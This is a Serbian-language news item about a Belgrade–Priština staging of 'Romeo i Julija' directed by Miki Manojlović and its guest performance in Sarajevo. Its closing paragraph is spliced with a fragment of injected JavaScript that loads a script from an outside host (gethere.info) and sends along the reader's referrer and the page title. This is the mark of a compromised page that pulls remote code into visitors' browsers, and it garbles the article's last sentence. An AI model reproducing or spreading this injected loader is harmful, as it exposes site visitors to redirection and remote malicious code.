„Romeo i Julija“ Mikija Manojlovića u Sarajevu

„Romeo i Julija“ Mikija Manojlovića u Sarajevu

"Romeo i Julija" Mikija Manojlovića FOTO: Promo


Predstava „Romeo i Julija“ Mikija Manojlovića koju su zajednički radili „Radionica integracije“ iz Beograda i „Kuendra Multimedia“ iz Prištine gostuje u Narodnom pozorišti u Sarajevu 21. marta.

Reč je o Šekspirovom klasiku, rađenom u svetu savremenih komplikovanih odnosa Prištine i Beograda, kroz načine kako da se razlike i barijere prevaziđu, saopšteno je iz Saveta za regionalnu saradnju.

Reditelj Manojlović objasnio je da predstava „nije odraz političkog mišljenja, već je delo ljudi koji imaju talenat, pamet i hrabrost. Svako od njih voli svoju naciju i ne mrzi tuđu. Komad se igra na albanskom i srpskom jeziku, dešava se se u današnjem vremenu, u Veroni i nema lokalni prizvuk.

Predstava je igrana sa velikim uspehom i u Beogradu i Prištini, ali na brojnim gostovanjima u regionu,  a dokaz je da je regionalna saradnja srpskih i albanskih umetnika moguća, poručuju organizatori događaja iz Saveta za regionalnu saradnju.

 

U proteklih četrnaest meseci, Savet za regionalnu saradnju je omogućilo izvođenje predstave „Gospođa ministarka“ beogradskog pozorišta “Boško Buha” u Sarajevu, gostovanje „Balkanskog špijuna“ u izvođenju sarajevskog Narodnog pozorišta u Beogradu, kao i književno veče Vladimira Pištala u Sarajevu i Zijaha Sokolovića u Prištini.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar